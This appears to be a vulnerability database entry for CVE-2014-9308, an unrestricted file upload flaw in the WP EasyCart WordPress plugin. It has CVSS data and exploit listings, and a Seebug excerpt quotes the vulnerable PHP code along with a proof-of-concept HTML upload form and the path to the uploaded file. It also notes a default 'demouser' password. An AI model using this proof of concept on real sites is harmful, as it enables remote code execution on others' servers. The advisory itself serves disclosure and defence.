Vulnerabilities > CVE-2014-9308 - Unspecified vulnerability in Wpeasycart WP Easycart

047910
CVSS 6.5 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
SINGLE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
wpeasycart
exploit available
metasploit
NVD
Published: 2015-01-15
Updated: 2015-01-16

Summary

Unrestricted file upload vulnerability in inc/amfphp/administration/banneruploaderscript.php in the WP EasyCart (aka WordPress Shopping Cart) plugin before 3.0.9 allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in products/banners/. <a href="http://cwe.mitre.org/data/definitions/434.html">CWE-434: Unrestricted Upload of File with Dangerous Type</a>

Vulnerable Configurations

Part Description Count
Application
Wpeasycart
93

Exploit-Db

  • descriptionWordPress Shopping Cart 3.0.4 - Unrestricted File Upload. CVE-2014-9308. Webapps exploit for php platform
    fileexploits/php/webapps/35730.html
    idEDB-ID:35730
    last seen2016-02-04
    modified2015-01-08
    platformphp
    port80
    published2015-01-08
    reporterKacper Szurek
    sourcehttps://www.exploit-db.com/download/35730/
    titleWordPress Shopping Cart 3.0.4 - Unrestricted File Upload
    typewebapps
  • descriptionWordPress WP EasyCart Unrestricted File Upload. CVE-2014-9308. Webapps exploit for php platform
    idEDB-ID:36043
    last seen2016-02-04
    modified2015-02-10
    published2015-02-10
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/36043/
    titleWordPress WP EasyCart - Unrestricted File Upload

Metasploit

descriptionWordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /inc/amfphp/administration/banneruploaderscript.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server. In versions <= 3.0.8 authentication can be done by using the WordPress credentials of a user with any role. In later versions, a valid EasyCart admin password will be required that is in use by any admin user. A default installation of EasyCart will setup a user called "demouser" with a preset password of "demouser".
idMSF:EXPLOIT/UNIX/WEBAPP/WP_EASYCART_UNRESTRICTED_FILE_UPLOAD
last seen2020-06-05
modified2018-10-01
published2015-01-10
referenceshttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9308
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
titleWordPress WP EasyCart Unrestricted File Upload

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/129875/wpshoppingcart-shell.txt
idPACKETSTORM:129875
last seen2016-12-05
published2015-01-09
reporterKacper Szurek
sourcehttps://packetstormsecurity.com/files/129875/WordPress-Shopping-Cart-3.0.4-Unrestricted-File-Upload.html
titleWordPress Shopping Cart 3.0.4 Unrestricted File Upload

Seebug

bulletinFamilyexploit
description<p># 受影响版本: WordPress Shopping Cart 3.0.4&nbsp;</p><p># 日期: 29-10-2014</p><p># 软件链接: <a href="https://wordpress.org/plugins/wp-easycart/" rel="nofollow">https://wordpress.org/plugins/wp-easycart/</a></p><p># CVE: CVE-2014-9308</p><p># 类别: 应用程序</p><p>漏洞详情:</p><p>任何注册用户都可以上传任何文件。<br></p><p>上传点: wp-easycart\inc\amfphp\administration\banneruploaderscript.php<br></p><p>$date = $_POST['datemd5'];</p><p>$usersqlquery = sprintf("SELECT &nbsp;ec_user.*, ec_role.admin_access FROM &nbsp;ec_user &nbsp;LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE &nbsp;ec_user.password = '%s' AND &nbsp;(ec_user.user_level = 'admin' OR ec_role.admin_access = 1)", mysql_real_escape_string($requestID));</p><p>$userresult = mysql_query($usersqlquery);</p><p>$users = mysql_fetch_assoc($userresult);</p><p>if ($users || is_user_logged_in()) {</p><p> $filename = $_FILES['Filedata']['name'];</p><p> $filetmpname = $_FILES['Filedata']['tmp_name'];</p><p> $fileType = $_FILES["Filedata"]["type"];</p><p> $fileSizeMB = ($_FILES["Filedata"]["size"] / 1024 / 1000);</p><p> $explodedfilename = pathinfo($filename);</p><p> $nameoffile = $explodedfilename['filename'];</p><p> $fileextension = $explodedfilename['extension'];</p><p> move_uploaded_file($_FILES['Filedata']['tmp_name'], "../../../products/banners/".$nameoffile."_".$date.".".$fileextension);</p><p>}</p> 验证: Login as regular user (created using wp-login.php?action=register): &lt;form action=&#34;http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php&#34; method=&#34;post&#34; enctype=&#34;multipart/form-data&#34;&gt; &lt;input type=&#34;hidden&#34; name=&#34;datemd5&#34; value=&#34;1&#34;&gt; &lt;input type=&#34;file&#34; name=&#34;Filedata&#34;&gt; &lt;input value=&#34;Upload!&#34; type=&#34;submit&#34;&gt; &lt;/form&gt; File will be visible: http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
idSSV:89276
last seen2017-11-19
modified2015-08-31
published2015-08-31
sourcehttps://www.seebug.org/vuldb/ssvid-89276
titleWordPress Shopping Cart 3.0.4 --任意文件上传

References